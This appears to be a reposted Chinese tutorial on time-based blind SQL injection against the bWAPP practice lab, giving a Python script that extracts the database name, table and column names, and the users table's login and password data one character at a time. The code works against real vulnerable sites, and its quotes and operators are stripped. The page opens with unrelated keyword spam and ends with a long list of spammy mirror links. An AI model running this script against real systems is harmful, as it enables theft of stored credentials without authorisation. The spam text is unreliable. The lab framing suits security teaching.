怎么做网络推广赚钱,宁波外贸seo网站建设,花式表白网址,城市房产网文章目录 一、获取数据库名称长度二、获取数据库名称三、获取表名总长度四、获取表名五、获取指定表列名总长度六、获取指定表列名七、获取指定表指定列的表内数据总长度八、获取指定表指定列的表内数据 一、获取数据库名称长度
测试环境是bwapp靶场 SQL Injection - Blind - … 文章目录 一、获取数据库名称长度二、获取数据库名称三、获取表名总长度四、获取表名五、获取指定表列名总长度六、获取指定表列名七、获取指定表指定列的表内数据总长度八、获取指定表指定列的表内数据 一、获取数据库名称长度
测试环境是bwapp靶场 SQL Injection - Blind - Time-Based
import requests
import timeHEADER{Cookie:BEEFHOOKsC9TPJjSgW8Y6CDh1eKrvcYP2vwhfFGpwNOTmU92yEiWtYEjcQpYCgFxMp5ZVLrIY4ebNwNv9dHeZhMz; securitylow; PHPSESSIDi79vfbbj4l30k326ckunvitfe5; security_level0
}
BASE_URLhttp://127.0.0.1:9004/sqli_15.php?def get_database_name_length(value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(database()){} and sleep(1) -- {}.format(value1, i, value2)start_time time.time()resp requests.get(url,headersHEADER)#print(resp.content)if time.time()-start_time1:print(数据库长度为:{}.format(i))count ibreakreturn count执行语句: databaselen get_database_name_length(“title”, “actionsearch”) 1 执行结果 tips:title,actionsearch需要使用burp抓包获得 –两边有空格
二、获取数据库名称
def get_database_name(len, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr(database(),{},1)){} and sleep(2) -- {}.format(value1, i, j, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time2:print({}:{}.format(i,j),chr(j))str(chr(j))breakprint(数据库名称为:,str)return str执行语句: database get_database_name(databaselen,“title”, “actionsearch”) 执行结果
三、获取表名总长度
def get_table_name_length(database, value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema {}), 1)) {} and sleep(1) -- {}.format(value1, database,i, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time1:print(表名总长度为:{}.format(i))count ibreakreturn count执行语句: tablelen get_table_name_length(database,“title”, “actionsearch”) 1 执行结果
四、获取表名
def get_table_name(len,database, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr((select GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema {}),{},1)){} and sleep(2) -- {}.format(value1, database, i,j, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time2:#print({}:{}.format(i,j),chr(j))str(chr(j))breakprint({}:.format(i),str)print(表名为:,str)return str执行语句: get_table_name(tablelen,database,“title”, “actionsearch”) 执行结果
,
五、获取指定表列名总长度
def get_column_name_length(database,table, value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(substr((select group_concat(column_name) from information_schema.columns where table_name{} and table_schema{}), 1)) {} and sleep(1) -- {}.format(value1, table,database,i, value1)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time1:print(列名总长度为:{}.format(i))count ibreakreturn count执行语句 columnlen get_column_name_length(database, “users”,“title”, “actionsearch”) 1 执行结果
六、获取指定表列名
def get_column_name(len,database, table, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr(substr((select group_concat(column_name) from information_schema.columns where table_name{} and table_schema{}), 1),{},1)){} and sleep(2) -- {}.format(value1, table, database, i,j, value2)start_time time.time()resp requests.get(url,headersHEADER),if time.time()-start_time2:str(chr(j))breakprint({}:.format(i),str)print(列名为:,str)return str执行语句 get_column_name(columnlen, database, “users”,“title”, “actionsearch”) 执行结果
七、获取指定表指定列的表内数据总长度
def get_data_name_length(table, username, password, value1, value2):count 0for i in range(100):urlBASE_URL{}Man of Steel and length(substr((select group_concat({}, :, {}) from {}), 1)) {} and sleep(1) -- {}.format(value1, username, password, table,i, value2)start_time time.time()resp requests.get(url,headersHEADER)if time.time()-start_time1:print(列数据总长度为:{}.format(i))count ibreakreturn count执行语句 datalen get_data_name_length(“users”, “login”, “password”,“title”, “actionsearch”) 1 执行结果
八、获取指定表指定列的表内数据
def get_data_name(len, table, username, password, value1, value2):str for i in range(1,len):for j in range(127):urlBASE_URL{}Man of Steel and ascii(substr((select group_concat({}, :, {}) from {}),{},1)){} and sleep(2) -- {}.format(value1, username, password, table, i,j, value2)start_time time.time()resp requests.get(url,headersHEADER),if time.time()-start_time2:str(chr(j))breakprint({}:.format(i),str)print(登录数据为:,str)return str执行语句 get_data_name(datalen, “users”, “login”, “password”,“title”, “actionsearch”) 执行结果 我们发现使用这种方法似乎比burp更快更高效只是从列爆破开始需要自己选表名 文章转载自: http://www.morning.jjzbx.cn.gov.cn.jjzbx.cn http://www.morning.fxygn.cn.gov.cn.fxygn.cn http://www.morning.ddgl.com.cn.gov.cn.ddgl.com.cn http://www.morning.rkfh.cn.gov.cn.rkfh.cn http://www.morning.qzpqp.cn.gov.cn.qzpqp.cn http://www.morning.lmrjn.cn.gov.cn.lmrjn.cn http://www.morning.jypqx.cn.gov.cn.jypqx.cn http://www.morning.rqxhp.cn.gov.cn.rqxhp.cn http://www.morning.pjqxk.cn.gov.cn.pjqxk.cn http://www.morning.chzbq.cn.gov.cn.chzbq.cn http://www.morning.rkck.cn.gov.cn.rkck.cn http://www.morning.zztkt.cn.gov.cn.zztkt.cn http://www.morning.pwksz.cn.gov.cn.pwksz.cn http://www.morning.frsxt.cn.gov.cn.frsxt.cn http://www.morning.xrmwc.cn.gov.cn.xrmwc.cn http://www.morning.qwbtr.cn.gov.cn.qwbtr.cn http://www.morning.qxmys.cn.gov.cn.qxmys.cn http://www.morning.tfsyk.cn.gov.cn.tfsyk.cn http://www.morning.tmjhy.cn.gov.cn.tmjhy.cn http://www.morning.tkjh.cn.gov.cn.tkjh.cn http://www.morning.lhxkl.cn.gov.cn.lhxkl.cn http://www.morning.rxhsm.cn.gov.cn.rxhsm.cn http://www.morning.rzjfn.cn.gov.cn.rzjfn.cn http://www.morning.pfggj.cn.gov.cn.pfggj.cn http://www.morning.lpnb.cn.gov.cn.lpnb.cn http://www.morning.jjzrh.cn.gov.cn.jjzrh.cn http://www.morning.qzqjz.cn.gov.cn.qzqjz.cn http://www.morning.lphtm.cn.gov.cn.lphtm.cn http://www.morning.yktwr.cn.gov.cn.yktwr.cn http://www.morning.gzgwn.cn.gov.cn.gzgwn.cn http://www.morning.nrzkg.cn.gov.cn.nrzkg.cn http://www.morning.ryxdf.cn.gov.cn.ryxdf.cn http://www.morning.ggnjq.cn.gov.cn.ggnjq.cn http://www.morning.hhfwj.cn.gov.cn.hhfwj.cn http://www.morning.tsnmt.cn.gov.cn.tsnmt.cn http://www.morning.lhygbh.com.gov.cn.lhygbh.com http://www.morning.lltdf.cn.gov.cn.lltdf.cn http://www.morning.kljhr.cn.gov.cn.kljhr.cn http://www.morning.dtnyl.cn.gov.cn.dtnyl.cn http://www.morning.mkygc.cn.gov.cn.mkygc.cn http://www.morning.phtqr.cn.gov.cn.phtqr.cn http://www.morning.gbtty.cn.gov.cn.gbtty.cn http://www.morning.xmxbm.cn.gov.cn.xmxbm.cn http://www.morning.dgng.cn.gov.cn.dgng.cn http://www.morning.kfclh.cn.gov.cn.kfclh.cn http://www.morning.hrtfz.cn.gov.cn.hrtfz.cn http://www.morning.lmpfk.cn.gov.cn.lmpfk.cn http://www.morning.knmby.cn.gov.cn.knmby.cn http://www.morning.zmzdx.cn.gov.cn.zmzdx.cn http://www.morning.lbrrn.cn.gov.cn.lbrrn.cn http://www.morning.ldqzz.cn.gov.cn.ldqzz.cn http://www.morning.wdxr.cn.gov.cn.wdxr.cn http://www.morning.knngw.cn.gov.cn.knngw.cn http://www.morning.sqxr.cn.gov.cn.sqxr.cn http://www.morning.fkwp.cn.gov.cn.fkwp.cn http://www.morning.pynzj.cn.gov.cn.pynzj.cn http://www.morning.xbmwm.cn.gov.cn.xbmwm.cn http://www.morning.hqxyt.cn.gov.cn.hqxyt.cn http://www.morning.lhyhx.cn.gov.cn.lhyhx.cn http://www.morning.ljdd.cn.gov.cn.ljdd.cn http://www.morning.rkhhl.cn.gov.cn.rkhhl.cn http://www.morning.qcfgd.cn.gov.cn.qcfgd.cn http://www.morning.btpzn.cn.gov.cn.btpzn.cn http://www.morning.qcfgd.cn.gov.cn.qcfgd.cn http://www.morning.nydgg.cn.gov.cn.nydgg.cn http://www.morning.ngcw.cn.gov.cn.ngcw.cn http://www.morning.tpqzs.cn.gov.cn.tpqzs.cn http://www.morning.tqklh.cn.gov.cn.tqklh.cn http://www.morning.dyxlm.cn.gov.cn.dyxlm.cn http://www.morning.tbrnl.cn.gov.cn.tbrnl.cn http://www.morning.plqqn.cn.gov.cn.plqqn.cn http://www.morning.bncrx.cn.gov.cn.bncrx.cn http://www.morning.jhtrb.cn.gov.cn.jhtrb.cn http://www.morning.gtnyq.cn.gov.cn.gtnyq.cn http://www.morning.ylzdx.cn.gov.cn.ylzdx.cn http://www.morning.dxhdn.cn.gov.cn.dxhdn.cn http://www.morning.dzgyr.cn.gov.cn.dzgyr.cn http://www.morning.ghfmd.cn.gov.cn.ghfmd.cn http://www.morning.kbgzj.cn.gov.cn.kbgzj.cn http://www.morning.mzydm.cn.gov.cn.mzydm.cn
